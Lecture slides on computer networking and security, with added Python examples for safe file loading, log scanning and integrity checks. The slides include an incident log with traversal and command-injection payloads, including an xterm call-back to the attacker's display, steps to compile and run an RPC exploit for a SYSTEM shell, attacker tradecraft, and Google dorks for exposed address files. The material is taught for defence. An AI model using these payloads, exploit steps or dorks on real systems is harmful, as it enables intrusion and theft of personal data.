Computer Networking and Security
RUDI LUMANTO
STMIK NUSA MANDIRI
November 2008
References and Contact Info
- Glenn Berg, "Networking Essentials", New Riders
- Deborah Russell, G.T. Gangemi Sr., "Computer Security Basics", O'Reilly & Associates
- John E. Canavan, "Fundamentals of Network Security", Artech House
- The Internet
CONTACT: RUDI LUMANTO
[email protected]
0815-1036-9754
STMIK NUSA MANDIRI
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
GRADING CRITERIA
- Assignments (2-4 reports): 20%
- Mid-term exam: 30%
- Attendance: 10%
- Final exam: 40%
SYLLABUS
- Overview
- Network standards (OSI)
- Network components
- Network protocol (TCP/IP)
- Network OS and services
- Network/Internet security
SYLLABUS (continued)
- Software threats: virus, worm, etc.
- Internet threats: TCP attack, DNS, DoS, etc.
- Firewall and Intrusion Detection System (IDS)
- Cryptography and its applications
- VPN
COMPUTER NETWORKING and SECURITY: OVERVIEW
Networking topics:
- Network standards
- Network components
- Protocol (TCP/IP)
- Network OS and services
Security topics:
- Internet threats: TCP attack, DoS, DNS, etc.
- Software threats: virus, worm, etc.
- Firewall and IDS
- Cryptography and applications
- VPN
COMPUTER NETWORKING and SECURITY
1. OVERVIEW
Outline
- Simple cases and tools
- Why computer networking, and why security?
- Computer security goals
- Threats, vulnerabilities, attacks
- Policy and measures
- Making a good security policy
Simple cases and tools
(seeing the technique/information behind a case)
A Security Case
A company called "Acme-art Inc." runs an online business on the Internet. It keeps a database that records all customer information, including credit card numbers, and the database is connected to its web site www.acme-art.com, which is protected by a firewall.
On 31 October 2001 an intruder broke into the system, stole all the credit card information and posted it to a Usenet newsgroup. Within a few hours the company had lost millions of dollars and its reputation, and it had to invest much more money to keep the business alive.
What happened?
How could it happen?
Fact: the firewall is installed, and Internet access to the site is only possible over HTTP on port 80.
Security team investigation: Sample case 1
Looking for clues in the log file...

A
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
B
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
C
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
D
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
E
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
F
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Security team investigation: Sample case 1
Part A in the log file
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
Browsing ...
Security team investigation: Sample case 1
Part B in the log file
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
Browsing ...
Security team investigation: Sample case 1
Part C in the log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
Trying direct access to /cgi-bin/ ... error response (403 Forbidden)
Security team investigation: Sample case 1
Part D in the log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
Attacking ... security hole 1: index.cgi is called directly, then with an empty page= parameter.
Security team investigation: Sample case 1
Perl script (shown on the slide)
Security hole 1: the page parameter received from the form is passed straight to the index.cgi script without any validation.
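The Perl script from the slide is not reproduced here. As an added example, the Python below (example code, not the original index.cgi) mirrors the two flaws the investigation attributes to it: the page= value is joined to the document root with no validation, so "../" sequences walk out of it (hole 1), and a value wrapped in "|" would be opened as a command pipe, as Perl's two-argument open() does (hole 2, exploited in part F below). Next to it sits a hardened loader. The document root layout, the ".shtml" naming rule, the fixture files and the function names are assumptions of this example; the pipe case is reported rather than executed.

```python
import os
import re
import tempfile
from urllib.parse import unquote_plus

# Assumed naming rule for includable pages (the real index.cgi had none).
ALLOWED_PAGE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.shtml$")


def two_arg_open_mode(arg):
    """How Perl's two-argument open() reads the 'page' value: a leading or
    trailing '|' turns the open into a command pipe (this is hole 2)."""
    if arg.startswith("|") or arg.endswith("|"):
        return "pipe"
    return "file"


def vulnerable_read(docroot, page):
    """Mirrors the flawed index.cgi: the decoded parameter is glued to the
    document root with no check, so '../' walks out of it (hole 1).  A
    command pipe is reported instead of executed, to keep the demo safe."""
    page = unquote_plus(page)
    if two_arg_open_mode(page) == "pipe":
        # The original script would hand this to /bin/sh.  We do not.
        return "WOULD EXECUTE: " + page.strip("|")
    with open(docroot + "/" + page, "rb") as fh:     # Perl-style "$docroot/$page"
        return fh.read().decode()


def safe_read(docroot, page):
    """Hardened loader: allow-list the name, then confirm the resolved path
    (symlinks included) still lives directly under the document root."""
    page = unquote_plus(page)
    if not ALLOWED_PAGE.match(page):
        raise ValueError("rejected page name: %r" % page)
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, page))
    if os.path.dirname(target) != root:
        raise ValueError("outside document root: %r" % target)
    with open(target, "rb") as fh:
        return fh.read().decode()


def build_docroot():
    """Constructed fixture: <tmp>/www/html/falls.shtml as document root
    content, plus <tmp>/passwd standing in for /etc/passwd two levels up."""
    base = tempfile.mkdtemp()
    docroot = os.path.join(base, "www", "html")
    os.makedirs(docroot)
    with open(os.path.join(docroot, "falls.shtml"), "w") as fh:
        fh.write("<h1>Falls</h1>")
    with open(os.path.join(base, "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    return docroot


def demo():
    """Run the case's requests through both loaders; returns a result map."""
    docroot = build_docroot()
    out = {}
    out["normal"] = vulnerable_read(docroot, "falls.shtml")
    out["traversal_vuln"] = vulnerable_read(docroot, "../../passwd")
    out["pipe_vuln"] = vulnerable_read(docroot, "|ls+-la+/%0aid%0awhich+xterm|")
    out["normal_safe"] = safe_read(docroot, "falls.shtml")
    for bad in ("../../passwd", "/../../../../etc/passwd", "|ls+-la+/|"):
        try:
            safe_read(docroot, bad)
            out[bad] = "ALLOWED"
        except ValueError:
            out[bad] = "blocked"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-28s %r" % (key, value))
```

The allow-list is the real fix; the realpath check is a second layer that also catches a symlink planted inside the document root. Rejecting on "../" alone is not enough, because the pipe form in part F contains no traversal at all.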
Security team investigation: Sample case 1
Part E in the log file
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
Attacking ... security hole 1: recovering the passwd file
Security team investigation: Sample case 1
Passwd file
root:x:0:0:root:/root:/bin/bash
......
......
......
Lion:x:500:500::/home/lion:/bin/bash
Effect of security hole 1: recovery of the important "passwd" file
Security team investigation: Sample case 1
Part F in the log file
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Attacking ... security hole 2: direct execution of server commands (ls -la /, id, which xterm)
Security team investigation: Sample case 1
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Decoded, the parameter is |xterm -display 10.0.1.21:0.0 &| : an xterm started on the server in the background, with its window sent to the attacker's X display at 10.0.1.21.
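As an added example, not part of the original slides, the Python below parses common-log-format lines like the ones in this case (the sample lines are copied from the slides into a constructed string) and flags the requests the team labelled holes 1 and 2: "../" traversal in a decoded parameter, shell metacharacters or newlines in it, and the xterm call-back to the attacker's display. The function names and the finding labels are this example's own. Note that every malicious request got a 200, so a detector keyed only on error status codes would see nothing beyond the lone 403.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample: the A-F request lines of the case plus benign traffic.
SAMPLE_LOG = """\
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
"""

# NCSA common log format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_line(line):
    """Split one log line into fields; None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(target):
    """Findings for one request target, judged on the decoded path and
    on each decoded query value separately (so a literal '&' between
    parameters is not mistaken for an injected one)."""
    parts = urlsplit(target)
    values = [unquote_plus(parts.path)]
    values += [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    findings = []
    if any("../" in v for v in values):
        findings.append("path-traversal")            # hole 1
    if any(re.search(r"[|;&`\n]", v) for v in values):
        findings.append("command-injection")         # hole 2
    if any("xterm" in v and "-display" in v for v in values):
        findings.append("reverse-x11-session")       # the attacker's xterm call-back
    return findings


def scan(log_text):
    """Return (timestamp, ip, status, target, findings) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec["target"])
        if findings:
            hits.append((rec["ts"], rec["ip"], rec["status"], rec["target"], findings))
    return hits


if __name__ == "__main__":
    for ts, ip, status, target, findings in scan(SAMPLE_LOG):
        print(ts, ip, status, ",".join(findings), target)
```

Decoding before matching matters: the newline that separates ls, id and which arrives as %0a, and the background "&" as %26, so a rule applied to the raw request line would miss both.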
Information/technique behind the case
- Understanding of computers and networks
- Information about the target
- HTTP structure
- CGI/Perl
- The Linux system and its commands
Default httpd file structure: what is the web site structure?
(Directory tree labelled Lisv01 on the slide, in text form)
/ (root)
  home/
    u01/ u02/ u03/ ...      (default user directories)
      public_html/
  var/
    www/
      html/                 (default document root)
    log/
      httpd/
  etc/
    httpd/
      conf/
        httpd.conf          (file)
    init.d/
      httpd                 (file)
  sbin/
  bin/
  dev/
  usr/ ...
* Document root: the directory that holds HTML documents.
Behind the Web
(Figure, in text form: three ways a web application can run.)
1. Client-side application: the WWW browser fetches HTML and script (JavaScript) from the WWW server over the Internet/intranet and executes the application inside the browser.
2. Network-loading application: the browser downloads the application itself (Java applet, ActiveX) from the WWW server and executes it on the client.
3. Server-side application: the browser sends a request over the Internet/intranet; the WWW server software executes the application (CGI, Active Server Pages) on the server and returns the result.
The index.cgi of sample case 1 is of the third kind: its input came straight from the request and it ran on the server, which is why an unvalidated parameter turned into file reads and command execution there.
Sample case 2
Sample case 2
After a period of new recruitment, a server in a company suddenly crashed. The company network became unavailable for a while, and this led to a large loss of production.
What happened?
How could it happen?
No indication in the log files!
Sample case 2
Security team investigation: looking for clues by social engineering
One new employee installed Windows 2000 Server on his computer and connected it to the LAN with a global IP address.
Other clues:
1. Nessus report on vulnerabilities in Windows 2000
2. Exploit program available
Analysis of the host: Nessus report on the Windows 2000 Server after IIS installation

Address of host | Port/Service           | Issue regarding port
192.168.27.31   | ftp (21/tcp)           | Security hole found
192.168.27.31   | smtp (25/tcp)          | Security hole found
192.168.27.31   | http (80/tcp)          | Security hole found
192.168.27.31   | nntp (119/tcp)         | Security hole found
192.168.27.31   | msrpc (135/tcp)        | Security hole found
192.168.27.31   | netbios-ssn (139/tcp)  | No security hole found
192.168.27.31   | https (443/tcp)        | No security hole found
192.168.27.31   | microsoft-ds (445/tcp) | Security hole found
......          | ....                   | ....
Sample case 2
NESSUS report in detail
(end of the preceding entry) Other references: IAVA:2003-A-0012; NESSUS ID: 11835

Vulnerability: msrpc (135/tcp)
The remote host is running a version of Windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability, namely the MsBlaster worm.
Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352
BID: 8205
Other references: IAVA:2003-A-0011
NESSUS ID: 11806

Warning: msrpc (135/tcp)
Distributed Computing Environment (DCE) services running on the remote host
Sample case 2
NESSUS ID: identity number of the vulnerability check in NESSUS
BID: Bugtraq ID: related documentation regarding the vulnerability, including exploit code; see the SecurityFocus site
Simulation
1. Download the exploit source file (from the SecurityFocus site or the Whoppix CD)
   $ cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c .
2. Compile the source file
   $ gcc oc192-dom.c
3. Run the exploit against the IP address of the target machine
   $ ./a.out -d 192.168.94.204
Result: system access on the target
C:\WINNT\SYSTEM32>
Information/technique behind the case
- Understanding of the network
- Insufficient security orientation for the new employee
- Lack of knowledge about the OS
- There is always exploit code on the Internet
- Lack of information about updates
Why Computer Networks?
1. File sharing: a file can be accessed at any time and from anywhere
2. Effective data transfer: data is delivered quickly and efficiently
3. Hardware sharing: one printer, hard disk, etc. can be used by everyone
4. Real-time communication: communication via text, audio, images or video in real time
5. Operational cost reduction: lower telephone costs, paper usage, postage, etc.
File/Information resource sharing
Information resources: printers, data, files.
Users can share a printer connected to the LAN; there is no need to connect a printer to each computer.
Users can share data on the computers: a user on computer C can handle files on computer B as if they were his own files.
Effective data transfer
- The data transmission speed is tens to several hundred Mbps. For example, an A4-sized document (30 Kbytes, i.e. 240,000 bits) can be transmitted over a 10 Mbps LAN in 0.024 seconds.
- bps (bits per second): the unit rate at which data can be transmitted over a communication line, expressed as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one second.
Hardware sharing
- Effective use of hardware (printer, hard disk, etc.)
- Easy to add new computers or relocate existing computers
- Easy to connect computers of different vendors
Example uses of a network
Seat reservation network
- Inquiries are issued from various places
- Connected to the seat reservation database on the central computer
- Answers to inquiries are generated immediately
- Also updates the database and issues a ticket
Examples of similar systems: money withdrawal, balance inquiry, etc.
Types of Network
Mainly divided into two types based on their scale (the area that a network covers).
- LAN is implemented within a building or factory.
- WAN is implemented by connecting two or more LANs: between offices and laboratories, or between two countries.
Why Computer Security?
- To protect company/individual assets: hardware, software and INFORMATION (data, ability and reputation)
- To gain a competitive advantage: how many people would use a bank's Internet banking system if they knew that the system had been hacked in the past?
- To comply with regulatory requirements
- To keep your job
Computer Security Goals
- Confidentiality
- Integrity
- Availability
Confidentiality: prevention of unauthorized access to data, and of accidental data disclosure.
Integrity: prevention of improper modification of the data, whether intentional or accidental: 1) modification of the data by unauthorized parties; 2) operation on the data by authorized personnel in ways that are incompatible with the nature (syntax) of the data, leading to its corruption; 3) any modification of append-only records that alters their evidential value.
Availability: measures taken to protect data should not make it difficult to access and modify the data in the ways in which it was intended.
Threats, Vulnerabilities and Attacks
THREATS
Anything that can disrupt the operation, functioning, integrity or availability of a computer system.
- Stand-alone threats: threats that arise without any connection to another system. Ex: virus, password cracker.
- Connection threats: threats that arise because of a connection to another system.
Threats arising from connection to other computers
- Information leak: a database of customer information, including credit card numbers, is leaked from an Internet service provider.
- Falsification: the contents of the web site of a public institution are rewritten with the political messages of a dissident group.
- Denial of service: a bookshop site is attacked and its server goes down, discontinuing service.
- Impersonation: an intruder fakes a membership site for the purchase of merchandise.
- Attack platform: a corporation whose network administered a server used as a platform for attacking other sites was sued for compensation for the damage caused.
Vulnerabilities
A weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat.
1. POOR DESIGN: hardware and software systems that contain design flaws that can be exploited. Ex: sendmail flaws in early versions of Unix that allowed attackers to gain privileged root access.
2. POOR IMPLEMENTATION: systems that are incorrectly configured because of inexperience, insufficient training or sloppy work. Ex: a system that does not restrict access privileges on critical executable files.
3. POOR MANAGEMENT: inadequate procedures and insufficient checks and balances. Ex: no documentation and no monitoring.
Critical Vulnerabilities and Vulnerability Scanning
- Certain security vulnerabilities are declared critical when they are (or are about to be) actively exploited and represent a clear and present danger.
- Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access.
Types of vulnerability

OS/Program name | Cause | Influence
Index Server (Windows NT), Index Service (Windows 2000) | ISAPI extension idq.dll overflow | Local system permission seized by an outsider
telnetd (FreeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) | Buffer overflow during AYT optional packet processing | telnetd permission (normally root) seized by an outsider
sadmind (Solaris 2.3 - 7) | Buffer overflow during NETMGT_PROC_SERVICE request processing | Command executable with root permission by an outsider
SSH 1.2.31, OpenSSH 2.2 and earlier | Overflow of an int variable in the detect_attack function | Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) | Buffer overflow in a shared library | Arbitrary command executable with root permission by an outsider
BIND 8.2.x (Red Hat, Turbolinux, Solaris, AIX, etc.) | Buffer overflow during TSIG processing | Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat Linux 6.2 and earlier, etc.) | Format string bug in the site-exec and setproctitle functions | Execution permission (normally root) seized by an outsider
IIS 4.0 (Windows NT), IIS 5.0 (Windows 2000) | Access to a file outside the root directory permitted when the path name is Unicode-encoded | Shell command executed with IUSR_Machinename permission by an outsider
ATTACKS
A specific technique used to exploit a vulnerability. Ex: the threat could be denial of service, the vulnerability is in the design of the OS, and the attack could be a "ping of death".
- Passive attacks: gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis.
- Active attacks: overt actions on the computer system.
Denial of Service
(Figure, in text form: an attack platform sends a large volume of data, or packets that crash the system, to the target host; the target's service goes down due to overload.)
Policy and Measure
Security trinity: the foundation for all security policies and measures that an organization develops and deploys. Its three parts are prevention, detection and recovery (see Security operations below; the figure on the slide shows the Security triangle with Prevention at one corner).
What is security?
Definitions from the American Heritage Dictionary:
- Freedom from risk or danger: safety
- Measures adopted ... to prevent a crime
Computer security measures: mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.
Key point
Computer security is not only a technical problem; it is a business and people problem. The technology is the easy part; the difficult part is developing security policies and a plan that fit the organization's business operation, and getting people to comply with the plan.
Social engineering: non-technical methods hackers employ to gain access to a system; it refers to the process of convincing a person to reveal information.
Security operations
- Prevention of accidental capture or modification of information
- Detection of all improper access to data and system resources
- Recovery from unauthorized access: restoring data values, system integrity, etc.
Policies and procedures
- User privileges
- Data backup
- Security tools to deploy
- Monitoring the integrity
- Response to incidents
- User roles, etc.
Types of users
- Hacker: a user who tries to obtain access using advanced knowledge and techniques.
- Cracker: a user who attempts sabotage and other subversive activities with malicious motives.
- Script kiddy: a user who has little technical capability and uses tools available on the Internet when attempting cyber attacks.
(Figure: all three aim at a vulnerability in the corporate network: intrusion, subversion, sabotage.)
Integrity check tool
(Figure, in text form: the /etc/passwd file is hashed (MD5) and the hash value recorded: dc577ef5f97b671781c04425737bc4df. After the file is edited/falsified the hash is recomputed as b0ed782bbd4c8445f07538a3ede788eb; the mismatch shows the file was altered.)
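As an added example, not taken from the slide, the Python below implements the integrity check the figure sketches: record a digest for each watched file, later recompute and report what changed. It uses SHA-256 instead of the slide's MD5, because MD5 collisions are practical today. The watched files, the tampering and the function names are constructed for the demonstration.

```python
import hashlib
import json
import os
import tempfile


def file_digest(path, algo="sha256"):
    """Hex digest of a file, read in chunks so large files are fine."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(paths, algo="sha256"):
    """Record the digest of every watched file.  Keep the result somewhere the
    intruder cannot rewrite (read-only media, another host): a baseline that
    sits next to the files it protects is only as trustworthy as they are."""
    return {p: file_digest(p, algo) for p in paths}


def verify(baseline, algo="sha256"):
    """Recompute and compare: 'ok', 'altered' or 'missing' per file."""
    report = {}
    for path, recorded in baseline.items():
        if not os.path.exists(path):
            report[path] = "missing"
        elif file_digest(path, algo) != recorded:
            report[path] = "altered"
        else:
            report[path] = "ok"
    return report


def demo():
    """Constructed scenario in a temp dir: baseline three files, then append a
    second uid-0 account to passwd and delete shadow, as an intruder might."""
    d = tempfile.mkdtemp()
    passwd, shadow, hosts = (os.path.join(d, n) for n in ("passwd", "shadow", "hosts"))
    with open(passwd, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\nlion:x:500:500::/home/lion:/bin/bash\n")
    with open(shadow, "w") as fh:
        fh.write("root:*:14000:0:99999:7:::\n")
    with open(hosts, "w") as fh:
        fh.write("127.0.0.1 localhost\n")

    stored = json.dumps(take_baseline([passwd, shadow, hosts]))   # what you would store off-host

    with open(passwd, "a") as fh:                                 # the tampering
        fh.write("toor:x:0:0::/root:/bin/bash\n")
    os.remove(shadow)

    return {os.path.basename(p): s for p, s in verify(json.loads(stored)).items()}


if __name__ == "__main__":
    for name, status in demo().items():
        print("%-8s %s" % (name, status))
```

The check only tells you that a file differs from the baseline, not what changed or who changed it; pair it with the log monitoring listed under security operations. An intruder with root can also replace the checker itself, which is another reason to run it from, and store its baseline on, media the compromised host cannot write.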
Security tools and security products
(Figure: a malicious user on the Internet and a malicious user inside the corporate network, both facing the servers/clients.)
Network security (countermeasures against hacking from the Internet):
- Router (filtering)
- Firewall (VPN)
- N-IDS
- Vulnerability audit
Server security:
- H-IDS
- Log monitoring
- Falsification prevention
- Vulnerability audit
Miscellaneous:
- Virus scan
- Encryption (SSH)
Firewall?
(Figure, in text form: the Internet on one side and the intranet on the other, with the firewall between them. A public WWW server and a public FTP server are reachable from the Internet; intranet clients and an internal server sit behind the firewall. Numbered flows: ① HTTP to the public WWW server, ② HTTP from an intranet client, ③ FTP to the public FTP server, ④ HTTP to the internal server, ⑤ an unspecified application to the internal server.)
Gateway-type firewall techniques:
- Packet filtering
- Application gateway
- Stateful inspection
- Authentication
Note from sample case 1: a firewall that allows port 80 through passes the attacker's requests along with everyone else's; it does not protect a flawed CGI script behind it.
Encryption: VPN (Virtual Private Network)
A VPN replaces a leased line with encrypted communication over the public Internet, e.g. using IPsec (also part of IPv6).
(Figure, in text form: a remote-access user and two sites with FW/VPN routers, connected across providers A, B, C and D and an IX; the traffic between the FW/VPN routers is encrypted.)
Making a good security policy
Making a good security policy
- Penetration test / ethical hacking: understanding what is inside the hacker's mind
- Security trinity
- Security goals
Definition of "Ethical Hacking"
Ethical hacking is where a computer and network expert attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing and red teaming. Individuals involved in ethical hacking are sometimes called white hats, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat.
One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.
Inside the Hacker's Mind
- Attack successfully and stay safe -
- Focus on the target
- Never use your own information
- Never leave your footprints
- Be able to come back again at any time
HACKER'S PROCEDURE
Hacker's Procedure/Steps
- Targeting
- Scanning
- Remote attack
- Local attack
- Log removal / deception
- Space using
- Time stamp
- Back door
Phases:
1. Information gathering
2. Attack, intrusion
3. Unauthorized act
4. Actions taken after the unauthorized act
Example of Targeting
All information about the target
- Technique name: web browser targeting
- Goals: personal information about the target
- Operation base: any web browser with a search engine site (Google); online databases (WHOIS, IP conversion, etc.)
Location, related company/organization, news, telephone number, contact (mail address), web author's ideas/thoughts/behaviour, site software
Targeting with Google
By using the basic search techniques combined with Google's advanced operators, anyone can perform information gathering and vulnerability searching using Google. This technique is commonly referred to as Google hacking.
Google hacking
Mastering Google using its standard options:
- Double quotation "..." : the keyword is recognized as a phrase
- Hyphen (-) : exclude pages that contain the word
- site: : search only inside the given site
- * : wildcard; use it inside double quotation to match any word in the indicated position
- intitle: : search limited to the web page title
- inurl: : search limited to the web page URL
- intext: : search limited to the body text of the web page
- filetype: : search focused on the extension type of the file
- phonebook: : search for telephone numbers
Google hacking
Mastering Google using its options
- site: ... searching only inside the site
  "hacker" site:www.cnn.com   or   site:www.cnn.com hacker
  This query searches for the word hacker, restricting the search to the http://www.cnn.com web site. How many pages on the CNN web server contain the word hacker?
Google hacking
Mastering Google using its options
- * ... wildcard; use with double quotation to match any word in the indicated position
  "He is a * Hacker"
Google hacking
Mastering Google using its standard options
- intitle: ... search limited to the web page title
  intitle:"Hacker"
Google hacking
Mastering Google using its standard options
- inurl: ... search limited to the web page URL
  inurl:www.securityfocus.com
Google hacking
Mastering Google using its standard options
- intext: ... search limited to the body text of the web page
  intext:"earthquake"
Google hacking
Mastering Google using its standard options
- filetype: ... search focused on the extension type of the file
  "hacking" filetype:ppt
  "whoppix" filetype:iso
Google hacking
Mastering Google using its standard options
- phonebook: ... search for telephone numbers
  phonebook:John Doe CA
More on Google hacking
Searching inside a site for what is (actually) not meant to be exposed to the public: finding directory listings on a server.
Directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.
Most directory listings begin with the phrase "Index of", which also shows in the title. An obvious query to find this type of page might be
intitle:index.of
which may find pages with the term "index of" in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
More on Google hacking
Combining Google options in queries
Several alternate queries provide more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by focusing not only on "index.of" in the title, but also on keywords often found inside directory listings, such as "parent directory", "name" and "size". Obviously, this search can be combined with other searches to find files or directories located in directory listings.
Examples:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs
bbs.dat inurl:"Index of" intitle:"Index of"
More on Google hacking
Example: searching for databases of people's addresses written in CSV, focusing on Japanese sites
filetype:csv address site:jp
Example: searching for databases of people's addresses written in Excel, focusing on UK sites
filetype:xls address site:uk
THANK YOU
The Dawn of the Net